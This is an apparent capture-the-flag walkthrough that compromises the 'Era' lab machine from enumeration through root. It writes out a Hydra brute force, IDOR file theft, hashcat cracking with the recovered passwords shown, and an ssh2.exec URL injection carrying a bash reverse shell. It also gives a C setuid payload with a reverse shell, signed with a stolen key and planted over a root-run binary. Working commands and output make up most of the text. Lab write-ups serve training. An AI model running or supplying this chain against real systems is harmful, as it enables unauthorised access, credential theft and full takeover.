Era

ENUMERATION

NMAP

nmap -p- --open -sCV 10.10.11.79 -oG allPorts
########################################3333
PORT      STATE SERVICE    VERSION
21/tcp    open  ftp        vsftpd 3.0.5
80/tcp    open  http       nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://era.htb/
56322/tcp open  tcpwrapped

WEB

basic virtual hosting era.htb

We can see the web site and do a vhost scan and fuff scan -->

VHOST Scan

ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt:FUZZ -u http://era.htb/ -H 'Host: FUZZ.era.htb' -fs 154
________________________________________________

file                    [Status: 200, Size: 6765, Words: 2608, Lines: 234, Duration: 288ms]

So I added the new vHost file.era.htb and then I visited it:

There are 5 endpoints:

• manage.php

• upload.php

• reset.php

• login.php

• security_login.php

I’ll check the security_login.php:

If I test a non-existent user, It gives me an error “User not found”. So I’ll brute force for usernames with /usr/share/seclists/Usernames/Names/names.txt. There are five user registered:

WE HAVE USERS! Add it into wordlist users.tx

FTP BruteForce

I decided to bruteforce ftp with Hydra:

hydra -L users.txt -P /usr/share/wordlists/rockyou.txt ftp://era.htb -t 50

Logging in we can find two directories: apache2_conf and php8.1_conf:

WEB LOGIN

I didn’t find anything, so I register in in the website and got in:

IDOR

It may be possible to perform a malicious file upload. My file got uploaded to http://file.era.htb/download.php?id=xxxx, so I’ll fuzz for existing files via IDOR. There are two files:

• signing.zip

• site-backup-30-08-24.zip

I’ll download both. Inside the backup there is a sqlite database, so I’ll open it with sqlbrowser:

DUMP SLQ DATABASE

sqlite3 filedb.sqlite
## DUMP
.dump

sqlitebrowser filedb.sqlite

We can read the admin security questions. As it didn’t work, I’ll try to crack he hashes:

hashcat -m 3200 -a 0 -o cracked.txt hashes.txt /usr/share/wordlists/rockyou.txt
 
[redacted]
cat cracked.txt 
$2y$10$S9EOSDqF1RzNUvyVj7OtJ.mskgP1spN3g2dneU.D.ABQLhSV2Qvxm:america
$2b$12$HkRKUdjjOdf2WuTXovkHIOXwVDfSrgCqqHPpE37uWejRqUWqwEL2.:mustang

I can now inside the website change the security questions for admin_ef01cab31aa with my user eldeim:

LOGIN TO ADMIN

• Now login using http://file.era.htb/security_login.php

admin : test : test : test

EXPLOTAION

Weaponization

Analyzing this other part of the singing.zip & code of upload.php:

To get rce we need to execute this in browser and dont forget to change <YOUR_IP>

http://file.era.htb/download.php?id=54&show=true&format=ssh2.exec://yuri:mustang@127.0.0.1/bash%20-c%20"bash%20-i%20>%26%20%2Fdev%2Ftcp%2F<YOUR_IP>%2F4444%200%3E%261%22;

In local shell do

nc -lnvp 4444

Pivoting

I logged in as user yuri. I can now change to user eric user the until password

eric : america

I do a tty sanetize

Privilege Escalation

For root i ran linpeas and got this binary called monitor

• To exploit this we need to make a malicious executable and upload it but we need to sign it too using the key we got in signing.zip

• In your local machine do make a file exploit.c

└─$ cat exploit.c         
#include <unistd.h>
int main() {
    setuid(0); setgid(0);
    execl("/bin/bash", "bash", "-c", "bash -i >& /dev/tcp/<YOUR_IP>/5555 0>&1", NULL);
    return 0;
}
└─$ x86_64-linux-gnu-gcc -o monitor exploit.c -static

└─$ file monitor    
monitor: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, BuildID[sha1]=5aee64d06999616a92857d433be5d85a5af4a5e5, for GNU/Linux 3.2.0, not stripped

• To sign this we need to

git clone https://github.com/NUAA-WatchDog/linux-elf-binary-signer.git
cd linux-elf-binary-signer
make clean
gcc -o elf-sign elf_sign.c -lssl -lcrypto -Wno-deprecated-declarations

└─$ ./elf-sign sha256 key.pem key.pem monitor
 --- 64-bit ELF file, version 1 (CURRENT), little endian.
 --- 26 sections detected.
 --- Section 0006 [.text] detected.
 --- Length of section [.text]: 480697
 --- Signature size of [.text]: 458
 --- Writing signature to file: .text_sig
 --- Removing temporary signature file: .text_sig
─$ mv monitor monitor.1

• Now run a python server upload this into this directory /opt/AV/periodic-checks

• To make this exploitable to do this in eric shell

wget http://<YOUR_IP>:8000/monitor.1
rm monitor
mv monitor.1 monitor
chmod +x monitor

• And in local machinesudo

nc -lnvp 1337

└─$ nc -lnvp 1337                 
listening on [any] 1337 ...
connect to [10.10.xx.xx] from (UNKNOWN) [10.10.11.79] 55440
bash: cannot set terminal process group (8204): Inappropriate ioctl for device
bash: no job control in this shell
root@era:~#